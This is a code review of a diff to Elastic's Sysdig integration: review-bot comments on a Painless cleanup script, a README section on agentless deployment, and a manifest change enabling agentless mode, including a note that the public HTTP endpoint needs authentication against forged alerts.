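Review bot: The `if:` on `script_sanitize_proc_timestamp_maps` re-tests four key variants that the body never uses; since the body only acts when `proc.pid` / `proc.ppid` are empty Maps, `if: ctx.sysdig?.event?.content?.fields?.proc instanceof Map` is sufficient and removes the duplicated `ctx.sysdig.event.content.fields` prefixes. The description says the empty maps are "left after timestamp field expansion", but the processor that produces them is not in this hunk; a one-line comment naming that processor (the rename of `proc.pid.ts` / `proc.ppid.ts` into `proc.pid_ts` / `proc.ppid_ts` appears to be the cause) would save the next reader a search. If a reason exists for keeping the ts-key checks in the condition — for example to leave a genuinely empty `proc.pid` map alone when no timestamp was ever present — it should be stated in the description, because as written the two conditions read as redundant.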
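Review bot: The rewritten `return` line in the final cleanup script still contains `v == '' || v == ''` twice, and the same duplication is in the `handleList` variant below; unless one of the two literals holds a non-printing character that this listing does not show, the second comparison is dead and should be dropped while the line is being touched, e.g. `return v == null || v == '' || v == '-1' || v == '{}' || (v instanceof Map && v.size() == 0) || (v instanceof List && v.size() == 0)`. If a distinct sentinel was intended, spell it as an escape such as `'\u00a0'` so the intent survives copy-paste. The enclosing `handleMap`/`handleList` functions start outside this hunk.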
@@ -1487,7 +1531,7 @@ processors: } else if (v instanceof List) { handleList(v); } - return v == null || v == '' || v == '' || v == '-1' || (v instanceof Map && v.size() == 0) || (v instanceof List && v.size() == 0) + return v == null || v == '' || v == '' || v == '-1' || v == '{}' || (v instanceof Map && v.size() == 0) || (v instanceof List && v.size() == 0) }); } handleMap(ctx); diff --git a/packages/sysdig/docs/README.md b/packages/sysdig/docs/README.md index 016e297ab94..4b8e2481bb3 100644 --- a/packages/sysdig/docs/README.md +++ b/packages/sysdig/docs/README.md @@ -26,6 +26,11 @@ Elastic Agent must be installed. For more details, check the Elastic Agent [inst Sysdig must be configured to output alerts to a supported output channel as defined in [Setup](#setup). The system will only receive common fields output by Sysdig's rules, meaning that if a rule does not include a desired field the rule must be edited in Sysdig to add the field. +## Agentless Enabled Integration + +Agentless integrations allow you to collect data without having to manage Elastic Agent in your cloud. They make manual agent deployment unnecessary, so you can focus on your data instead of the agent that collects it. For more information, refer to [Agentless integrations](https://www.elastic.co/guide/en/serverless/current/security-agentless-integrations.html) and the [Agentless integrations FAQ](https://www.elastic.co/guide/en/serverless/current/agentless-integration-troubleshooting.html). +Agentless deployments are only supported in Elastic Serverless and Elastic Cloud environments. This functionality is in beta and is subject to change. Beta features are not subject to the support SLA of official GA features. + ## Setup For step-by-step instructions on how to set up an integration, see the [Getting started](https://www.elastic.co/guide/en/starting-with-the-elasticsearch-platform-and-its-solutions/current/getting-started-observability.html) guide. 
diff --git a/packages/sysdig/manifest.yml b/packages/sysdig/manifest.yml index e2349a13546..d45ee222f8f 100644 --- a/packages/sysdig/manifest.yml +++ b/packages/sysdig/manifest.yml @@ -1,7 +1,7 @@ format_version: 3.3.2 name: sysdig title: "Sysdig" -version: "2.3.0" +version: "2.4.0" description: "Collect logs from Sysdig using Elastic Agent." type: integration categories: @@ -13,7 +13,7 @@ categories: - security conditions: kibana: - version: "^8.16.0 || ^9.0.0" + version: "^8.19.16 || ^9.3.5" elastic: subscription: "basic" screenshots: @@ -42,6 +42,15 @@ policy_templates: - name: sysdig title: Sysdig logs description: Collect logs from Sysdig using Elastic Agent. + deployment_modes: + default: + enabled: true + agentless: + enabled: true + release: beta + organization: security + division: engineering + team: security-service-integrations inputs: - type: http_endpoint title: Collect Sysdig Alerts via HTTP
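Review bot: Enabling `agentless` on this policy template means the `http_endpoint` input listed at the end of the hunk is hosted by Elastic and must be reachable from Sysdig over the public internet, yet neither this hunk nor the README addition says that request authentication on that listener is mandatory in that mode. If the input already declares shared-secret or HMAC style variables (they are not visible here), the agentless docs should state that they must be set, and ideally the manifest should make them required for the agentless deployment mode, since otherwise anyone who learns the URL can inject fabricated Sysdig alerts into the event data stream. The Kibana constraint also moves from `^8.16.0 || ^9.0.0` to `^8.19.16 || ^9.3.5`, a user-visible minimum-version bump that the `Enable Agentless deployment.` changelog entry does not mention; a short note there would help operators on older stacks.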